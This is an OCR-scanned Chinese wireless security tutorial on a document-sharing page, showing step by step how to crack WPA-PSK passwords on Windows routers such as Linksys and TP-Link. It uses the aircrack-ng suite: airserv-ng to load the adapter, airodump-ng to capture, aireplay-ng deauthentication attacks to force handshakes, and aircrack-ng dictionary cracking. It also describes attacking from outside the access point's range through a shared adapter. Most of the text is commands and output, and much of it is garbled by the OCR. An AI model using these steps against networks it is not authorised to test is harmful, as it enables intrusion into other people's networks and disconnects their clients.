无线安全教程5---Windows下破解无线WPA-PSK加密_第1页
无线安全教程5---Windows下破解无线WPA-PSK加密_第2页
无线安全教程5---Windows下破解无线WPA-PSK加密_第3页
无线安全教程5---Windows下破解无线WPA-PSK加密_第4页
无线安全教程5---Windows下破解无线WPA-PSK加密_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

1、V1SECURITYerOneWireless Sec urity Training无线安全系列教程Windows下破解无线WPA-PSK 加密适用对象:目前市面主流无线路由器如Linksys、Dlink、TPLink、BelKin等D . 1 使用 Aircrack-ng for Windows由于在Windows 环境下不能如Linux环境般直接调用无线网卡,所以需要使用其它工具来将无线网卡载入,以便攻击工具能够正常使用。在无线攻击套装Aircrack-ng 的Win dows 版本下内置了这样的工具,就是airserv- ng 。步骤 1 :打开 cmd,输入 cd aircrack f

2、ull 进入到 aircrack-ng for Windows版本所在目录,输入 airserv-ng,可看到C: airpack FuillairseFuUsae nairserv-ng 卜PTCP poit tolisten on-Hviifi deviceto sevuekcchan to stt ondebus levc 1参数解释:-P指定监听的端口,即提供连接服务的端口,默认为666 ;-d载入无线网卡设备,需要驱动支持;-c指定启动工作频道,一般设置为预攻击AP的工作频道,默认为 1-vdebug调试级别设定,第一步就是使用airserv- ng来载入我们当前使用的无线网卡,为后

3、续破解准备,命令如下:airserv -ng-d commview.dll|debug ”或者airserv -ng-d commview.dll|my adapter id”输入完后airserv-ng会自动搜寻现有无线网卡,会有提示,选择正确的无线网卡直接输入y,此时airserv-ng就在正常载入驱动后,同时开始监听本地的666端口,换句话说,其它计算机上的用户也可以连接到这个端口来使用这块网卡,往:命令找示符-airserv-ng -d commviewdil | debugC;aircrack Fullairscruns( -d conmuiEw.dll(debugOpencardl

4、ewd 11!dehuName : ICDininU lewPHO/W ire less 2200BG Network Connect Ionffet_suid: name: desc: NETGEAR MG511v2 54Mbps Wireless PC Cajd -数据包计划程序微型端口Does this look like ynuip card? yZn ySetting chan 1Openlogport 666Serviog commuiew.dll Sdebugf chan I on port 666Connect from 127.0,0L1Connect fron 127-00

5、L1Made By Christopher YangZerOneWirelessSec urityTraining无线安全系列教程步骤2 :接下来,可以使用 airodump-ng来搜索当前无线环境,注意,要另开一个cmd ,再输入命令如下:airodump-ng127.0.0.1: 666Made By Christopher YangMade By Christopher Yang、;命警覆示符-airodump-ng 127.0.0,1:666CH 8 H Elapsed:16 sJf 2007-09-2229:19BSIDPURBeacons#Datail/sCHMBEHCCIPHER

6、 AUTHESSID55250736.UFATK1PPSKTrueBSSIDSTATIONPWFRatePacketsProbes(not associated00:18:4D:78:B7:F4988-Q02True如上图,当确定预攻击目标AP的频道后,使用键盘组和Ctrl + C中断,即可使用如下参数来精确定位目标:airodump-ng-cha nnel nu mber -wfile name127.0.0.1:666这里我们输入 airodump-ng-channel 7 -wonewpa127.0.0.1:666回车可看到下图:c命令理示 1? - airudump-rtg - cha

7、nnel 7 -w onewpa 127.0.0,11&66-|DjCH 7 Elapsed:1 nin (2007-09-222&-21BSSIDPtffi ftXQBeaconsIt DataCHMB EMCGIFHEHAUTH 隣00:17:?n:68;F6:7B5526657330754. WPATKIPPSK TBSSIDSTATIONPWB RaceLostPacketsProbes00:1a:4D:78:B7:F41030- 0054True步骤3 :现在,就可以和前面在BackTrack2 讲述的一样进行 Deauth 攻击了,另开一个cmd,输入:aireplay-ng-01

8、 -a APs MAC 127.0.0.1:666Made By Christopher YangWSECURITYZerOneWirelessSec urityTraining无线安全系列教程Made By Christopher YangC : Sjiisrciack FullJair-Epla-ng =01 1 -a 010=丄 =127. B. 0.1 6&6OariiiQGt inn 呂 to 127-0 . B. 1 pa pt* - Connecticin successful2:22 :36 Wait in gr For heacoR frane CBSSID: 00:l?:9

9、fl :68 :F6:7B 20=22:38 Ha such BSSIB available.NH: this attack is more effective wFien targfeting a connected wire less client -c .2022*38 Sending DeAuth eo broadcast BSS D= 0 = 17*9A-B =F6 7B1 wijiiFitBC ; Ope rat lion naw xh; progi*BS&在有时候,会看到上面命令在结束时出现 wi_write:Operatio nnow progress 这样的提示,这个提示在很

10、多无线网卡下都会出现,意思是当前进程调用被占用,我们的Deauth攻击在大多数情况下并不会受此影响。步骤4 :再开一个cmd,输入命令查看是否捕获到WPA握手,aircrack-ng捕获的数据包名如果没有捕获到WPA握手,就会有下图显示0 handshake ,这个时候切回到刚才aireplay-ng所在cmd 中重复进行 Deauth 攻击。C: aircrack Fullaircrconewpa*capOpeninsf onewpa-01 .capRed 365 packets.tt BSSIDESSIDEncryption1 00:17;?ft=68:P6:7B TrueWPA Choo

11、sifig f irst netuork as t arge t.Opening oneupa01.capPspec if 1/ ft dictionary Cupt ion -w.攻击过程中注意观察当我们的airodump-ng 界面,当出现下列提示时,就表示成功截获到WPA握手数据包。c i 酣令援示符-airndump-ng -channel 7 -w onewpa 1274J.0.1666 v -3CH 7 H Elap&ed:B mins II20?-09-2220:28 JL WPft handshake: ILJ0:17:9A:6B:F6:ESSIDPWB RKQBeacunst

12、tData,#/sCtiHB ENCCIPHEfi AUTH ES00:17:9A:6S:F6:7B51314601231Q754 UPATKIPPSK TBSIISTftTIOHPURRateLostPacketsProbes00:17:?n;68:F6:7B00:09:2D:F4:5F:61910-004029TPLIHK,Truenot associatill00:18:4D:78:B7:F430-Q048?True这个时候再次使用aircrack-ng打开捕获的数据包,就可以看到截获到WPA 的显示了,此时,便可以进行WPA本地破解了。ZerOneWirelessSec urityTr

13、aining无线安全系列教程C:aii*cr*ck Full4ii*cr4ck-ng oneupd*.capOpening onewpa01,capHead 16354 packets.ESSIOEncrypt ion1WB:17:9fi:68:F6:7B TrueUFA Choosing f irst network as target.Open inf qnewpaQl capPlease spec a dictionft .输入on ewpa*.capaircrack-ng-w password.txt这里介绍一个小技巧,可以在输入数据包名后面加一个*号,来自动将捕获的该名称所有数据包整

14、合导入。回车后,如下图Made By Christopher YangMade By Christopher Yang如在Linux下破解 WPA 一般耐心地等待,就可以看到WPA密钥成功解出了。Made By Christopher YangflSECURITYgerOneWireless Sec urity Training无线安全系列教程Made By Christopher YangMade By Christopher YangD . 2 使用 Aircrack -ng for Win dows的细节放大:1 .在Windows 下使用aircrack-ng 来进行 WPA破解时,系

15、统会明显变得缓慢,CPU占有率也会在短期内达到高峰值,如下图,笔者笔记本的配置是讯驰1.73,内存为1G的DDR667,可依然是比较缓慢,不过这在运行破解程序的系统上很常见,所以建议在破解 的时候就不要进行其它大的交互操作。.i ai.xA ire racking 1.0 rt87Made By Christopher YangMade By Christopher Yang山一 Window枉善管薛曙J 73872 ke帀產立件仲弔记录哩口擊阿1用户应用握序淹程CT1T慎用Current passplipai-sLDO玄10S29物理内寺備总數1Q47960可角数5724&D不纭舞芬ET20

16、W息数斓數进程救2 0 7 1 4 ft B ? 0 B 0 fl 7 4 s 3 c 8 FIJC5 9 0 s B 夕llc 1 1 D 1 aF创內 s 6 1 DMkistcr Key卜;FAPOL HMA-Made By Christopher Yang认可用呈曲总逊5IQ772酿制2S1A310檢(!?内存曲总逊9TE24姑页数43596耒另页5*236Made By Christopher YangMade By Christopher Yang进程數:56CMJ使冃:1叫提交更改:5Q7M; Z+&CH2 .在无法使用 airserv-ng -d commview.dll|de

17、bug ” 命令,而不得不使用 airserv -ng-d commview.dll|my adapter id”来载入网卡时, 很多人会面临不知道如何查找网卡设备ID号的问题,这里介绍一个 Windows自带的getmac 命令, SECURITYCerOneWireless Sec urity Training无线安全系列教程 可以很有效的帮助我们查找网络设备号,找到MAC对应的设备ID,鼠标右键复制即可。3 .对于airserv-ng而言,其功能远不止用于Windows 本地破解这么单一。在将本机无线网卡设置为监听后,其它内网计算机都可以连接到该端口,来使用此无线网卡进行攻击, 换句话说,攻击者甚至可以不在AP的有效范

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论